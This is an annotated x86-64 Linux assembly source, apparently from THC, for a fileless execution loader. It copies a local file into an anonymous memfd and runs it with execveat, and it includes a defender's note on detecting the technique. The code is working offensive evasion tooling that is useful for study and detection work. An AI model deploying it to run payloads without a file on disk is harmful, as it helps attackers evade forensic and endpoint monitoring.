; This code was used to generate the ShellCode. You won't
; need it again. Published for educational purposes only.
; https://www.thc.org
;
; nasm -felf64 memexec.nasm && ld memexec.o && ./a.out
; Flow: memfd_create("egg") -> open("egg") -> copy the file into the memfd
;       1 KiB at a time -> execveat(memfd, "", AT_EMPTY_PATH) -> exit(0),
;       which is only reached if the exec failed.
; ABI:  Linux x86-64 raw syscalls: nr in rax; args in rdi, rsi, rdx, r10, r8, r9;
;       rcx and r11 are clobbered by `syscall`; result (or -errno) in rax.
; Regs: r8 = memfd (later reused for the execveat flags), r9 = fd of "egg".
; Note: no syscall return value is checked, so a failed memfd_create/open would
;       silently feed a -errno value into the next call as an fd.
; Defender's note: the executed image is backed by an anonymous memfd rather
;       than a path (its /proc/<pid>/exe resolves to "/memfd:egg (deleted)");
;       auditing memfd_create and execveat-with-AT_EMPTY_PATH is where this
;       pattern becomes visible.
global _start
section .text
_start:
push 0x00676765 ; "egg\0" as little-endian bytes; rsp now points at the NUL-terminated name
mov rax, 0x13f ; arg 0: memfd_create_NR (319)
mov rdi, rsp ; arg 1: name [egg]
xor rsi, rsi ; arg 2: flags = 0 (no MFD_CLOEXEC: the memfd stays open in the executed program)
syscall
mov r8, rax ; r8 = memfd (not checked: a negative value is -errno)
mov rax, 2 ; arg 0: open_NR
mov rdi, rsp ; arg 1: pathname "egg", relative to the current directory
xor rsi, rsi ; arg 2: flags = O_RDONLY; arg 3 (mode) is left unset and is ignored without O_CREAT
syscall
mov r9, rax ; r9 = fd of "egg" (not checked)
loop:
sub rsp, 0x400 ; 1 KiB read buffer below the name; never restored, so each iteration lowers rsp by 0x400
xor rax, rax ; arg 0: read_NR
mov rdi, r9 ; arg 1: FD [egg]
mov rsi, rsp ; arg 2: buffer
mov edx, 0x400 ; arg 3: length (writing edx zero-extends into rdx)
syscall
cmp rax, 0x00
jle done ; rax == 0 -> EOF, rax < 0 -> -errno; both stop the copy
mov rdx, rax ; arg 3: length (from read())
mov eax, 0x01 ; arg 0: write_NR
mov rdi, r8 ; arg 1: FD [memfd]; rsi still points at the buffer
syscall ; a short write is not retried
jmp loop
done:
mov rax, 322 ; arg 0: execveat_NR
mov rdi, r8 ; arg 1: dirfd = memfd (with AT_EMPTY_PATH this is the file that gets executed)
push 0x00 ; 8 zero bytes: serve both as the empty pathname and as a NULL argv terminator
mov rsi, rsp ; arg 2: pathname = "" (empty string)
mov rdx, rsp ; arg 3: argv = rsp, and [rsp] == 0, so argv[0] is NULL: an empty argv (argc == 0)
xor rcx, rcx ; NOT a syscall argument (rcx is clobbered by `syscall`); envp is passed in r10 below
mov r8, 0x1000 ; arg 5: flags = AT_EMPTY_PATH (r8 is free now: rdi already holds the memfd)
xor r9, r9 ; execveat takes 5 args; r9 would be a 6th and is ignored
xor r10, r10 ; arg 4: envp = NULL (Linux passes the 4th syscall arg in r10, not rcx)
syscall ; on success this never returns
mov rax, 60 ; arg 0: exit_NR; only reached if execveat failed
xor rdi, rdi ; arg 1: status 0 (the exec failure is not reported)
syscall